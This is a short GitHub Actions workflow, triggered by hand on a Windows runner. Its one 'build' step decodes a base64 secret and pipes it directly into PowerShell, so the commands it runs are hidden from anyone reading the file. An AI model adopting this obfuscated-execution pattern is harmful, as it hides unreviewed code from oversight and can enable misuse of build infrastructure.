name: build
on: workflow_dispatch
jobs:
  build:
    runs-on: windows-latest
    steps:
      - name: build
        run: |
          [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(${Env:BUILD})) | powershell.exe | Out-File -FilePath "build.txt"
        env:
          BUILD: ${{ secrets.BUILD }}
